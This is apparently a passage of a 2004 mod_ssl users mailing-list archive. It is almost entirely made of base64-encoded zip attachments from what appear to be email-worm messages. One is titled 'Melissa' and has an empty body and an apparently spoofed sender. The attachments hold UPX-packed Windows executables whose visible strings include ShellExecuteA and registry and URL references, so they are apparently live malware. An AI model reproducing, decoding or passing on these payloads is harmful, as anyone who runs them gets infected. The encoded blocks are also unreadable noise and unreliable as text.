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
O507wDtLPF48aDwvPTk9Qz1IPWs9iD2XPaE9eF8g2CKGWEcLMoYy/////6EyqjK1Mt4y5DLs
MgkzTTOiM9Iz5TPrMxA0/zQYNco1/////+41mzY1N1k3vDfON9o3DjgrOKc4FjmaO7U8vjzd
PMA930Tz/w8+HD5VPqc+9j4DPzgSzzDVMN/////dMO3PQjGBMaYxsTG6Mcsx0DH+MQ8yKDJ0
NH80jP////803zTuNBE1IzU/NXs1yTWsNrc2wDbONtQ25zb5NiE3J3/3//83MDc5N043ZTdw
N5A3qTevN8M3z3/9NyE4YzjZ/3/D/zj1OAA5CzkdOSofxjlQOnk6izqfOq46ATsH/////zsW
O2c7bDtyO307mzupO8M75jv2OwE8Mjw4PD48RDxK//8N/zxQPFY8XDxiGW48dDx6PIA8hjyM
PJI8mDye/////zykPKo8sDy2PLw8wjzIPM481DzaPOA85jzsPPI8+Dz+///W/zwEPQo9ED0W
PRyWPSg9Lj00PTo9QD1GPUw9fotb/FI9WD1ePRpqPSV2PXw9gv///xttjj2UPZo9oD2mPaw9
sj24Pb49xD3KPdA91j1AauH/3D3iPeg97j30PfqPPh1VkbAIDW6ghIL/gAPf/SH/lev+itGK
kNlflYPZ2gctqoLZ0AJ3KDD3B9giIYT3fT68F0Ao95QDnKY0FPcRIBR8NoUwF2KyAGR0ByD3
dAwoBjdAshwgGKhXEAoCSQz3TNkscmgB63rgs9kgFKciECOUJISCBKcRATYI6GTB4L1gCX7P
CSBgwbKldyAhwbIhu2AmOJCmc4EYYVZqqYh2gDArBXZespwQ0hCbKriy3bQXwhALs5ZV8MDB
pAHcKmAjI2HWCNSOBaAJN4vXoupT4Aj+s+tf3YH6sP8W6NOXK+g/ALe7Ox6jZBEJ6yQOHoM9
NncheA2//zUIIBQgAO9txwUKmScCuVQu1V+sEJv4jIsQ3+4wGu8yMRFUBv87MUYxWjFgMQda
p0CI4lxkFfSCZM0IMycuwEix7mRtX2N5VyMVYNQb4ssBxggqOKKIJEVaFoIJjN0YAQUbxSsG
sW5Q3WMvJG5lQRBFeGkUZEDdviD3Ek0OdWxo2VbxyE7rQRM6itmsWBHzQSgHVaAiQEHNDpCA
ATPqQS2b1g7TomZRJwKKTRjUQA7fAZFBjUHLAbJkUMneAbcMeRNCAbMKRgHss2FQjAltcGkK
bhjUO3Cnk3t+SygV0QrkaW8TCnjvUHlDbGFnvUQlO1HjDQZLFvXjAfJ8SVrQVuRB3ExIBGqM
AhgBMAhVsm5SlHRjc7olVEcB0QxvAIkK1qkKhbOwBGoB9u+Z1EigTghyAYFaCLbTEKjTbDam
ADGhOs02F7Kc5dmMGJE5AQuSiGWzyfTMLM8D+QQAQg8BDmCiXECOXhQqA5AvEsS5bwAEoPm6
qE9kOpAD1SFqtwJXqADEkHJyKs4MDkLU965sG/sGxCwPGckS9FQwownJslIYc8wdQtRsAOvE
an8ovpUnG7TGc5IAAAAAAAAAgAQA/wAAAAAAAAAAYL4AgEAAjb4AkP//V4PN/+sQkJCQkJCQ
igZGiAdHAdt1B4seg+78Edty7bgBAAAAAdt1B4seg+78EdsRwAHbc+91CYseg+78Edtz5DHJ
g+gDcg3B4AiKBkaD8P90dInFAdt1B4seg+78EdsRyQHbdQeLHoPu/BHbEcl1IEEB23UHix6D
7vwR2xHJAdtz73UJix6D7vwR23Pkg8ECgf0A8///g9EBjRQvg/38dg+KAkKIB0dJdffpY///
/5CLAoPCBIkHg8cEg+kEd/EBz+lM////Xon3uVsAAACKB0cs6DwBd/eAPwB18osHil8EZsHo
CMHAEIbEKfiA6+gB8IkHg8cFidji2Y2+AJAAAIsHCcB0PItfBI2EMKSzAAAB81CDxwj/lgi0
AACVigdHCMB03In5V0jyrlX/lgy0AAAJwHQHiQODwwTr4f+WELQAAGHpWmL//wAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAYAAAgAAAAAAAAAAA
AAAAAAAAAQABAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAAUAAAAKTAAADoAgAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAEAAQAAAHgAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAJAAAACQwwAA
FAAAAAAAAAAAAAAAoJAAACgAAAAgAAAAQAAAAAEABAAAAAAAgAIAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA
/wD/AP//AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAACHd3d3d3d3d3d3d3cAAAAAj//////////////3AAAAAI//////////////9w
AAAACP/3d3d3d3d3d3f/cAAAAAj/9///f/d3/3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3
d3d393f/d3//cAAAAAj/9///f/d3d3d//3AAAAAI//f//3/3d/93f/9wAAAACP/3d3d393f/
d3//cCgoKCgoKCgof////3d//3CCgoKCgoKCgn//9/////9wKP///////yh3d3d3d3//cIL/
///4KCiCf//3//9//3Ao8oKCgvKCKH//9///f/9wgvgoKC8oL4J3d3d3d3//cCjygoLygo8o
f//3//9//3CC/ygvKCgvgn//9///f/9wKP/y8oKP/yh3d3d3d3//cIL/LygoKP+Cf//3//9/
/3Ao8vKCgoKPKH//9///f/9wgvgoKPgoL4J3d3d3gAAAACjygo//go8o/////4//eACC////
////gv////+P94AAKCgoKCgoKCh3d3//j3gAAIKCgoKCgoKC/////4eAAAAAAAAI////////
//+IAAAAAAAACP//////////gAAAAAAAAAiIiIiIiIiIiIAAAAD///////////4AAAD+AAAA
/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAA/gAAAP4AAAD+AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAMAAAAHAAAAD/4AAB/+AAA/
/gAAf4iTAAAAAAEAAQAgIBAAAQAEAOgCAAABAAAAAAAAAAAAAAAAADDEAAAIxAAAAAAAAAAA
AAAAAAAAPcQAABjEAAAAAAAAAAAAAAAAAABKxAAAIMQAAAAAAAAAAAAAAAAAAFbEAAAoxAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABgxAAAbsQAAH7EAAAAAAAAjMQAAAAAAACaxAAAAAAAAKrE
AAAAAAAAS0VSTkVMMzIuRExMAGFkdmFwaTMyLmRsbABTSEVMTDMyLmRsbAB1c2VyMzIuZGxs
AABMb2FkTGlicmFyeUEAAEdldFByb2NBZGRyZXNzAABFeGl0UHJvY2VzcwAAAFJlZ0Nsb3Nl
S2V5AAAAU2hlbGxFeGVjdXRlQQAAAEZpbmRXaW5kb3dBAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQSwECFAAKAAAAAAAAfVsw
Sh/MnQA+AAAAPgAADAAAAAAAAAAAACAAAAAAAAAAeGhsaGt1a2UuZXhlUEsFBgAAAAABAAEA
OgAAACo+AAAAAA==

----------whhsukeyalqicpfkemgr--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Feb 27 23:49:56 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0995DA8948; Fri, 27 Feb 2004 23:49:56 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from DSEGEV (DSEGEV.nrel.gov [192.174.53.245])
	by master.modssl.org (Postfix) with SMTP id 402ECA8934
	for ; Fri, 27 Feb 2004 23:49:54 +0100 (CET)
Date: Fri, 27 Feb 2004 15:49:53 -0700
To: modssl-users@modssl.org
Subject: Melissa
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gymvxdsivmftxmevpsjw"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gymvxdsivmftxmevpsjw
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit



----------gymvxdsivmftxmevpsjw
Content-Type: application/octet-stream; name="baadbabba.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="dcacaaac.zip"

UEsDBAoAAAAAAMB9WzBKH8ydAD4AAAA+AAAMAAAAa3ZucmV2YWkuZXhlTVqQAAMAAAAEAAAA
//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4f
ug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K
JAAAAAAAAADEoj5LgMNQGIDDUBiAw1AYgMNQGIPDUBgO3EMYr8NQGGjcVRiBw1AYfONCGIHD
UBhHxVYYgcNQGFJpY2iAw1AYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAEwBAwBCRUBA
AAAAAAAAAADgAA8BCwEFDABAAAAAEAAAAHAAALCwAAAAgAAAAMAAAAAAQAAAEAAAAAIAAAQA
AAAAAAAABAAAAAAAAAAA0AAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAA
AAAAAAAAAACkwwAAFAEAAADAAACkAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABVUFgwAAAAAABwAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAA
AACAAADgVVBYMQAAAAAAQAAAAIAAAAA0AAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAA
ABAAAADAAAAABgAAADgAAAAAAAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
